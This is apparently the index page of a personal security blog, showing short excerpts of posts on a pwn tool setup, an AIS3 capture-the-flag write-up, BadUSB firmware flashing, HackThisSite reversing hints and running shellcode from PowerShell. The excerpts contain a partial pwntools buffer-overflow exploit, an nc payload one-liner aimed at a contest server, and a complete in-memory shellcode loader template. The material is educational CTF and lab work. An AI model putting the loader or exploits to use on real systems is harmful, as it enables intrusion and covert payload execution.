PWN tool list

Ubuntu 14.04 x64, 32-bit libs
apt-get install gcc-multilib
cd /etc/apt/sources.list.d
echo "deb http://old-releases.ubuntu.com/ubuntu/ raring main restricted universe multiverse" >ia32-libs-raring.list
apt-get update
apt-get install ia32-libs
dpkg --add-architecture i386
apt-get update
apt-get install libssl-dev:i386
PEDA
apt-get install nasm
micro-inetd
apt-get install libc6-dbg
https://github.com/longld/peda
qira https://github.com/BinaryAnalysisPlatform/qira
pwntools (includes checksec, ROPgadget)
Tools
sudo pip install git+https://github.com/Gallopsled/pwntools#egg=pwntools
fix bug
cp /usr/local/lib/python2.7/dist-packages/usr/lib/python2.7/dist-packages/capstone/libcapstone.so /usr/local/lib/python2.7/dist-packages/capstone/.
rp++ https://github.com/0vercl0k/rp/downloads
ncat sudo apt-get install netcat-traditional netcat-openbsd
nmap

November 25, 2015 · 1 min · Zet

AIS3 PWN

A quick write-up.
PWN1: drop it into IDA and you can see
if ( v4 == 0x90909090 )
  result = puts(aCensordCensord);
else
  result = printf("Your point is only %d, try hard!\n", v4, v1, v2, v3);
return result;
Just stuff it with 0x90 and it's done:
python -c 'print "\x90"*1000' | nc 52.69.163.194 1111
PWN2: after the 20th byte we control EIP.
gdb-peda$ info functions
All defined functions:
Non-debugging symbols:
0x08048364 _init
0x080483a0 read@plt
We can point it at read; in general the layout looks like: call ret argv1 argv2 argv3
We control read's return address and its arguments, so we can point ret and our shellcode at the same location; for the shellcode, just find a blank area and write it there.
from pwn import *
import time
r = remote('127.0.0.1', 4000)
read_adr = "\xa0\x83\x04\x08"
read = "\x00\x00\x00\x00" + "\x00\xa1\x04\x08" + "\x00\x01\x00\x00"
p = "a"*20 + read_adr + "\x00\xa1\x04\x08" + read
r....

November 24, 2015 · 1 min · Zet

BadUSB

https://slides.com/zettain/bad-usb
https://github.com/adamcaudill/Psychson
Supported devices:
Patriot 8GB Supersonic Xpress*
Kingston DataTraveler 3.0 T111 8GB
Silicon power marvel M60 64GB
Patriot Stellar 64 Gb
Phison Toshiba TransMemory-MX USB 3.0 16GB
Toshiba TransMemory-MX USB 3.0 8GB
Kingston DataTraveler G4 64 GB
Patriot PSF16GXPUSB Supersonic Xpress 16GB
Silicon Power 32GB Blaze B30 (SP032GBUF3B30V1K)
Kingston Digital 8GB USB 3.0 DataTraveler
Get the chip model.
Download the firmware and the burner files.
Firmware: PS2251-03 flash chip http://www.usbdev.ru/?wpfb_dl=777
Build environment: Visual Studio 2012, SDCC (Small Device C Compiler), install path C:\Program Files\SDCC
You can build DriveCom and Injector first...

April 12, 2015 · 1 min · Zet

HackThisSite Application Missions

app1 Hint: HEX
app2 Hint: HEX
app4 Hint: VB decompile, patch in OD. Hint: OD window plugin
app5 Hint: look around EBP, the answer is there too
0040109C 8B4D E0      mov ecx,dword ptr ss:[ebp-20]        ; algorithm starts here
0040109F 83C1 04      add ecx,4
004010A2 894D E0      mov dword ptr ss:[ebp-20],ecx
004010A5 8B55 DC      mov edx,dword ptr ss:[ebp-24]
004010A8 83EA 01      sub edx,1
004010AB 8955 DC      mov dword ptr ss:[ebp-24],edx
004010AE 837D E0 0D   cmp dword ptr ss:[ebp-20],0D
004010B2 73 28        jnb short app5win.004010DC
004010B4 8B45 E0      mov eax,dword ptr ss:[ebp-20]
004010B7 C1E8 02      shr eax,2
004010BA 8B4D F8      mov ecx,dword ptr ss:[ebp-8]
004010BD 8B55 DC      mov edx,dword ptr ss:[ebp-24]
004010C0 8B0481       mov eax,dword ptr ds:[ecx+eax*4]
004010C3 3B4495 E8    cmp eax,dword ptr ss:[ebp+edx*4-18]  ; compare ASCII, watch the stack
004010C7 74 11        je short app5win....

July 23, 2013 · 1 min · Zet

Use PowerShell to launch shellcode

Template for executing shellcode:
$code = '[DllImport("kernel32.dll")]public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);[DllImport("kernel32.dll")]public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);[DllImport("msvcrt.dll")]public static extern IntPtr memset(IntPtr dest, uint src, uint count);';
$winFunc = Add-Type -memberDefinition $code -Name "Win32" -namespace Win32Functions -passthru;
[Byte[]];
[Byte[]]$sc64 = SHELLCOD;
[Byte[]]$sc = $sc64;
$size = 0x1000;
if ($sc.Length -gt 0x1000) {$size = $sc.Length};
$x=$winFunc::VirtualAlloc(0,0x1000,$size,0x40);
for ($i=0;$i -le ($sc.Length-1);$i++) {$winFunc::memset([IntPtr]($x.ToInt32()+$i), $sc[$i], 1)};
$winFunc::CreateThread(0,0,$x,0,0,0);
for (;;) { Start-sleep 60 };
The SHELLCOD placeholder is the part to replace...

March 18, 2013 · 2 min · Zet